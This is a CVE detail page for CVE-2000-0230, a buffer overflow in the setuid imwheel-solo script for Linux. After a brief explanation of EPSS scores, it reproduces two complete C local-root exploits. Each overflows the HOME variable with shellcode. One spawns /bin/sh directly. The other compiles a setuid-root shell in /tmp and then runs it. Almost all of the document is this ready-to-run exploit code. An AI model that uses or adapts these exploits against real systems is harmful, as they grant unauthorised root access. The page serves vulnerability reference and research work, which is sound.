CVE-2000-0230 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. /* * imwheel local root exploit [ RHSA-2000:016-02 ] * funkysh 04/2000 funkysh@kris.top.pl */ #include <stdlib.h> #include <stdio.h> #define BUFFER 2070 #define NOP 0x90 #define PATH "/usr/X11R6/bin/imwheel-solo" char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46" "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long getesp(void) { __asm__("movl %esp,%eax"); } int main(int argc, char *argv[]) { int i, offset = 0; char buf[BUFFER]; long address; if(argc > 1) offset = atoi(argv[1]); address = getesp() + 1000 + offset; memset(buf,NOP,BUFFER); memcpy(buf+(BUFFER-300),code,strlen(code)); for(i=(BUFFER-250);i<BUFFER;i+=4) *(int *)&buf[i]=address; setenv("DISPLAY", "DUPA", 1); setenv("HOME", buf, 1); execl(PATH, PATH, 0); }

// source: https://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. /*** Halloween 4 local root exploit for imwheel-solo. Other distros are *** maybe affected as well. *** (C) 2000 by C-skills development. Under the GPL. *** *** Bugdiscovery + exploit by S. Krahmer & Stealth. *** *** !!! FOR EDUCATIONAL PURPOSES ONLY !!! *** *** other advisories and kewl stuff at: *** http://www.cs.uni-potsdam.de/homepages/students/linuxer *** ***/ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> #include <unistd.h> #include <errno.h> /* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755); */ char shell[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01\x46\xe2\xfa" "\xea\x0d\x2e\x75\x6c\x71\x2e\x63\x6e\x6e\x6c\x72\x69\x01\x80\xed" "\x66\x2a\x01\x01\x54\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xab\x11" "\x01\x01\x30\xc8\x8c\xb2\x3b\xee\xfe\xfe\xb9\xb7\x01\x01\x01\x88\xcb\x52\x88" "\xf2\xcc\x81\xb8\xec\x08\x01\x01\xb9\x0e\x01\x01\x01\x52\x88\xf2\xcc\x81\x30" "\xc1\x5a\x5f\x88\xed\x5c\xc2\x91\x91\x91\x91\x91\x91\x91\x91"; /* filename-buffer plus ret + ebp */ #define buflen (2048+8) int main(int argc, char **argv) { char *im[] = { "/usr/X11R6/bin/imwheel-solo", 0 }; char *a[] = { "/tmp/boomsh", 0 }; FILE *f; struct stat s; char boom[buflen+10]; int i = 0, j = 0, ret = 0xbfffee68; /* this address works for me */ if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) { perror("fopen"); exit(errno); } printf("Creating boom-shell...\n"); fprintf(f, "int main() {char *a[]={\"/bin/sh\",0};\nsetuid(0);\nexecve(*a, a, 0);\nreturn 0;}\n"); fclose(f); system("cc /tmp/boomsh.c -o /tmp/boomsh"); printf("Creating shellcode...\n"); memset(boom, 0, sizeof(boom)); memset(boom, 0x90, buflen); if (argc > 1) ret += atoi(argv[1]); else printf("You can also add an offset to the commandline.\n"); for (i = buflen-strlen(shell)-4; i < buflen-4; i++) boom[i] = shell[j++]; *(long*)(&boom[i]) = ret; printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n" "Respect other users privacy!\n"); setenv("HOME", boom, 1); setenv("DISPLAY", ":0", 1); printf("Invoking vulnerable program (imwheel-solo)...\n"); if (fork() == 0) { execl(im[0], im[0], im[1], im[2], 0); } sleep(4); memset(&s, 0, sizeof(s)); stat("/tmp/boomsh", &s); if ((S_ISUID & s.st_mode) != S_ISUID) { printf("Boom-shell not SUD-root! Wrong offset or patched version of imwheel.\n"); return -1; } /* Huh? :-) */ printf("Knocking on heavens door...\n"); execve(a[0], a, 0); return 0; }